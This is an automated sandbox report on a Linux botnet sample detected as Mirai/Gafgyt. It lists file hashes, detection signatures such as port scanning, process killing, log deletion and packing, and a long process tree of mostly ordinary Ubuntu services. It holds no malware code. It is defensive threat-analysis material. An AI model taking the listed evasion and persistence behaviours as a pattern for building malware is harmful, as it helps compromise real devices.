Loading ...

Play interactive tourEdit tour

Linux Analysis Report VAkpLB9NSD

Overview

General Information

Sample Name:VAkpLB9NSD
Analysis ID:553467
MD5:0825b7f6b6e9da31e17fd46e3a10740c
SHA1:7881665597156c61b9861714a3336de2033111f1
SHA256:3501f6be009a942c0511ff6a5b476722881edaf92a08e296310784be1beedee0
Tags:32elfintelmirai
Infos:

Detection

Gafgyt Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553467
Start date:15.01.2022
Start time:00:06:03
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:VAkpLB9NSD
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.evad.lin@0/228@14/0
Warnings:
Show All
  • Connection to analysis system has been lost, crash info: Unknown
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • systemd New Fork (PID: 5190, Parent: 1)
  • logrotate (PID: 5190, Parent: 1, MD5: ff9f6831debb63e53a31ff8057143af6) Arguments: /usr/sbin/logrotate /etc/logrotate.conf
    • gzip (PID: 5231, Parent: 5190, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5232, Parent: 5190, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
      • sh New Fork (PID: 5233, Parent: 5232)
      • invoke-rc.d (PID: 5233, Parent: 5232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: invoke-rc.d --quiet cups restart
        • runlevel (PID: 5234, Parent: 5233, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /sbin/runlevel
        • systemctl (PID: 5235, Parent: 5233, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-enabled cups.service
        • ls (PID: 5240, Parent: 5233, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
        • systemctl (PID: 5241, Parent: 5233, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
    • gzip (PID: 5242, Parent: 5190, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5243, Parent: 5190, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
      • sh New Fork (PID: 5244, Parent: 5243)
      • rsyslog-rotate (PID: 5244, Parent: 5243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
        • systemctl (PID: 5245, Parent: 5244, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • systemd New Fork (PID: 5191, Parent: 1)
  • install (PID: 5191, Parent: 1, MD5: 55e2520049dc6a62e8c94732e36cdd54) Arguments: /usr/bin/install -d -o man -g man -m 0755 /var/cache/man
  • systemd New Fork (PID: 5230, Parent: 1)
  • find (PID: 5230, Parent: 1, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
  • systemd New Fork (PID: 5239, Parent: 1)
  • mandb (PID: 5239, Parent: 1, MD5: 1dda5ea0027ecf1c2db0f5a3de7e6941) Arguments: /usr/bin/mandb --quiet
  • VAkpLB9NSD (PID: 5274, Parent: 5116, MD5: 0825b7f6b6e9da31e17fd46e3a10740c) Arguments: /tmp/VAkpLB9NSD
  • systemd New Fork (PID: 5291, Parent: 1)
  • journalctl (PID: 5291, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5308, Parent: 1)
  • systemd-journald (PID: 5308, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5311, Parent: 1)
  • journalctl (PID: 5311, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5360, Parent: 1)
  • dbus-daemon (PID: 5360, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5373, Parent: 1)
  • whoopsie (PID: 5373, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5375, Parent: 1860)
  • pulseaudio (PID: 5375, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5379, Parent: 1)
  • systemd-logind (PID: 5379, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5439, Parent: 1)
  • rtkit-daemon (PID: 5439, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5443, Parent: 1)
  • polkitd (PID: 5443, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5448, Parent: 1)
  • agetty (PID: 5448, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • gdm3 New Fork (PID: 5449, Parent: 1320)
  • Default (PID: 5449, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5452, Parent: 1)
  • rsyslogd (PID: 5452, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • gdm3 New Fork (PID: 5453, Parent: 1320)
  • Default (PID: 5453, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5454, Parent: 1320)
  • Default (PID: 5454, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5458, Parent: 1)
  • gpu-manager (PID: 5458, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5459, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5460, Parent: 5459)
      • grep (PID: 5460, Parent: 5459, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5461, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5462, Parent: 5461)
      • grep (PID: 5462, Parent: 5461, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5463, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5464, Parent: 5463)
      • grep (PID: 5464, Parent: 5463, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5465, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5466, Parent: 5465)
      • grep (PID: 5466, Parent: 5465, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5467, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5468, Parent: 5467)
      • grep (PID: 5468, Parent: 5467, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5469, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5470, Parent: 5469)
      • grep (PID: 5470, Parent: 5469, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5472, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5473, Parent: 5472)
      • grep (PID: 5473, Parent: 5472, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5474, Parent: 5458, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5477, Parent: 5474)
      • grep (PID: 5477, Parent: 5474, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5480, Parent: 1)
  • generate-config (PID: 5480, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5496, Parent: 5480, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5497, Parent: 1)
  • gdm-wait-for-drm (PID: 5497, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5502, Parent: 1)
  • gdm3 (PID: 5502, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5507, Parent: 5502)
    • plymouth (PID: 5507, Parent: 5502, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5525, Parent: 5502)
    • gdm-session-worker (PID: 5525, Parent: 5502, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 5529, Parent: 5525, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
        • dbus-daemon (PID: 5531, Parent: 5529, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 3 --session
          • dbus-daemon New Fork (PID: 5533, Parent: 5531)
            • false (PID: 5534, Parent: 5533, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
        • dbus-run-session (PID: 5535, Parent: 5529, MD5: 245f3ef6a268850b33b0225a8753b7f4) Arguments: dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart
          • dbus-daemon (PID: 5536, Parent: 5535, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --nofork --print-address 4 --session
    • gdm3 New Fork (PID: 5537, Parent: 5502)
    • Default (PID: 5537, Parent: 5502, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5538, Parent: 5502)
    • Default (PID: 5538, Parent: 5502, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5508, Parent: 1)
  • accounts-daemon (PID: 5508, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5518, Parent: 5508, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5519, Parent: 5518, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5520, Parent: 5519, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5521, Parent: 5520)
          • locale (PID: 5521, Parent: 5520, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5522, Parent: 5520)
          • grep (PID: 5522, Parent: 5520, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • fusermount (PID: 5548, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5570, Parent: 1)
  • journalctl (PID: 5570, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5571, Parent: 1)
  • systemd-journald (PID: 5571, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5572, Parent: 1)
  • dbus-daemon (PID: 5572, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5573, Parent: 1)
  • whoopsie (PID: 5573, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5578, Parent: 1)
  • systemd-logind (PID: 5578, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5635, Parent: 1860)
  • pulseaudio (PID: 5635, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5639, Parent: 1)
  • gpu-manager (PID: 5639, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5640, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5642, Parent: 5640)
      • grep (PID: 5642, Parent: 5640, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5644, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5645, Parent: 5644)
      • grep (PID: 5645, Parent: 5644, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5649, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5650, Parent: 5649)
      • grep (PID: 5650, Parent: 5649, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5654, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5655, Parent: 5654)
      • grep (PID: 5655, Parent: 5654, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5657, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5658, Parent: 5657)
      • grep (PID: 5658, Parent: 5657, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5660, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5661, Parent: 5660)
      • grep (PID: 5661, Parent: 5660, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5667, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5668, Parent: 5667)
      • grep (PID: 5668, Parent: 5667, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5672, Parent: 5639, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5673, Parent: 5672)
      • grep (PID: 5673, Parent: 5672, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5643, Parent: 1)
  • rtkit-daemon (PID: 5643, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5648, Parent: 1)
  • polkitd (PID: 5648, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5656, Parent: 1)
  • journalctl (PID: 5656, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5659, Parent: 1)
  • agetty (PID: 5659, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5664, Parent: 1)
  • rsyslogd (PID: 5664, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5674, Parent: 1)
  • journalctl (PID: 5674, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5675, Parent: 1)
  • systemd-journald (PID: 5675, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5677, Parent: 1)
  • generate-config (PID: 5677, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5678, Parent: 5677, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5680, Parent: 1860)
  • dbus-daemon (PID: 5680, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5683, Parent: 1)
  • gdm-wait-for-drm (PID: 5683, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5684, Parent: 1)
  • whoopsie (PID: 5684, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5686, Parent: 1)
  • dbus-daemon (PID: 5686, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5689, Parent: 1)
  • systemd-logind (PID: 5689, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5749, Parent: 1860)
  • pulseaudio (PID: 5749, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5751, Parent: 1)
  • journalctl (PID: 5751, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5752, Parent: 1)
  • rtkit-daemon (PID: 5752, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5756, Parent: 1)
  • polkitd (PID: 5756, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5762, Parent: 1)
  • agetty (PID: 5762, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5765, Parent: 1)
